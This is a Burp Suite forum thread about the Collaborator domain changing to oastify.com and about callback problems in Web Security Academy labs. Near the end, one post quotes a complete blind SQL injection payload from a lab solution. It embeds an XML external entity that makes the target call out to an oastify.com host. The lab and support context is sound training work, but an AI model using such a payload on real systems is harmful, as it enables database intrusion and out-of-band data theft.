Burp Suite User Forum

Create new post

collaborator dns changed to oastify.com ?

Radoslav | Last updated: Jun 03, 2022 02:21PM UTC

has been mail collaborator switched to use oastify.com domain ? version: Professional v2202.3.9 build 13363 bodik

Liam, PortSwigger Agent | Last updated: Jun 03, 2022 04:38PM UTC

We've added a new domain name for the public Burp Collaborator server. Unless you have configured Burp to use a private Collaborator server, Burp Scanner and the Burp Collaborator client will now use oastify.com for their Collaborator payloads instead of burpcollaborator.net. This will help to reduce false negatives, enabling you to identify out-of-band vulnerabilities that were previously hidden due to widespread blocking of the old domain name. This new domain name is in addition to the old one, so you'll still be able to see interactions with any of your existing burpcollaborator.net payloads. Please note that if you're running Burp within a closed network and previously had to allow connections to burpcollaborator.net on port 443 in order to poll for interactions, you may need to do the same for oastify.com. - https://portswigger.net/burp/releases/professional-community-2022-3

Radoslav | Last updated: Jun 03, 2022 04:53PM UTC

thanks for quick response bodik

Crysthoffer | Last updated: Jul 07, 2022 01:22PM UTC

Al so works for the Burp Academy I'm trying to solve some labs using collaborator but it's not working

Liam, PortSwigger Agent | Last updated: Jul 08, 2022 05:46AM UTC

Hi Crysthoffer. Which labs are. you having an issue with?

Hamza | Last updated: Apr 25, 2023 06:53AM UTC

Burp Collaborator URLs are not receiving the hits on some labs. Currently I have faced the issue on https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf

Liam, PortSwigger Agent | Last updated: Apr 25, 2023 09:38AM UTC

Hi Hamza. Thanks for your message. The lab is passing our testing; are you still encountering this issue?

Lukasz | Last updated: Jun 19, 2023 01:12PM UTC

Hi, the same problem occurs for XSS labs: - Lab: Exploiting cross-site scripting to steal cookies https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies - Lab: Exploiting cross-site scripting to capture passwords https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords Both require collaborator for recomended solution, but it seems that *.oastify.com is blocked.

Liam, PortSwigger Agent | Last updated: Jun 20, 2023 10:38AM UTC

Thanks for your message, Lukasz.

Has this issue only occurred recently? Have you tried unblocking oastify.com?

Lukasz | Last updated: Jun 20, 2023 04:49PM UTC

I think *.oastify.com is blocked in lab environment. I cannot receive any request in my burp collaborator. Have you tested XSS labs which require burp collaborator (these two I mentioned before) if they work with oastify.com domain?

Ben, PortSwigger Agent | Last updated: Jun 21, 2023 10:00AM UTC

Hi Lukasz, All of the labs that require the use of the Burp Collaborator do now support the use of *.oastify.com. I have just run through both of the labs that you have mentioned and I am able to solve both of them using oastify.com. Do you have any further details of what you are entering in the blog post for each of the labs so that we can take a look at this for you?

ckid | Last updated: Mar 22, 2024 06:43PM UTC

Hi, i have the same issue with lab "Blind SQL injection with out-of-band interaction." Pyaload is Cookie: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//gk4x1n5c53xebsu7lgud4sw3hunlbbz0.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual -- The payload is taken straight from the solution.

ckid | Last updated: Mar 22, 2024 07:07PM UTC

nevermind, it works :-)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.